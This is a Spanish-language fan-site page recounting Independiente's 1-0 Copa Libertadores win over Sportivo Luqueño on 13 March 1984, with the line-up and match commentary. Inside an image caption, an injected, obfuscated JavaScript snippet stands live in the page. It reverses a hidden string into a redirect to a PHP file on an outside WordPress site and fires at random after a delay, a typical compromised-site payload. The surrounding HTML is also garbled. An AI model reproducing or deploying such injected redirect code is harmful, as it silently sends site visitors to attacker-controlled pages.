Conectate con nosotros

Efemérides

Efemérides del 13 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1984Independiente juega su segundo partido en la fase de grupos de la Copa Libertadores 1984, y nuevamente es de visitante, ya que recordemos que en el debut había igualado 1 a 1 en La Plata frente a Estudiantes. En esta oportunidad, viaja a Asunción del Paraguay para medirse con Sportivo Luqueño en el Estadio Defensores del Chaco.

Se trató de un partido bastante chato y con poco fútbol, pero este Independiente de tan enorme jerarquía llega a marcar la diferencia con un gran gol de Jorge Burruchaga a los 42 minutos. Al final les dejo el video y les aconsejo no perdérselo, en primer lugar por la magnífica pared entre Ricardo Bochini y “Burru” para concluir en gol, pero observen además en el inicio de la jugada, la posición en la que se encuentra Enzo Trossero para recibir el pase de Claudio Marangoni. Está demasiado entrado en campo rival el central izquierdo, un detalle que resulta muy difícil ver hoy en día.

El resto del encuentro tuvo poco para Independiente, con Bochini siendo claramente la figura pero sin compañía, mientras que el equipo paraguayo eligió el peor camino, lanzando centros a las cabezas de sus delanteros sin tener en cuenta que el arquero del Rojo era Carlos Goyén, tal vez el arquero que mejor cortó centros en toda la historia del club, gracias a una enorme capacidad de salto y gran habilidad por su práctica en el básquet.

Dos partidos con tres puntos sumados en condición de visitante, en un muy buen inicio, aunque unos días después llegaría la única derrota que sufrió el equipo en toda la Copa, frente a Olimpia en Paraguay. El Rojo fue netamente superior pero se quedó con las manos vacías frente a un equipo que ya se perfilaba para dar una dura pelea por el liderazgo del grupo.

En aquel día frente a Luqueño los 11 del Rojo fueron: Carlos Goyén; Rodolfo Zimmermann, Hugo Villaverde, Enzo Trossero y Carlos Enrique; Ricardo Giusti, Claudio Marangoni, Jorge Burruchaga y Ricardo Bochini; Jorge Clara y Alejandro Barberón (53’ Enrique Sánchez), todos bajo el mando del D.T. José Omar Pastoriza. Un dato de interés: el arquero de Luqueño era, ni más ni menos, que José Luis Félix Chilavert.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»86″ height=»66″/></figure></div>



<p>Aquí <strong>el gol de “Burru</strong>”:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides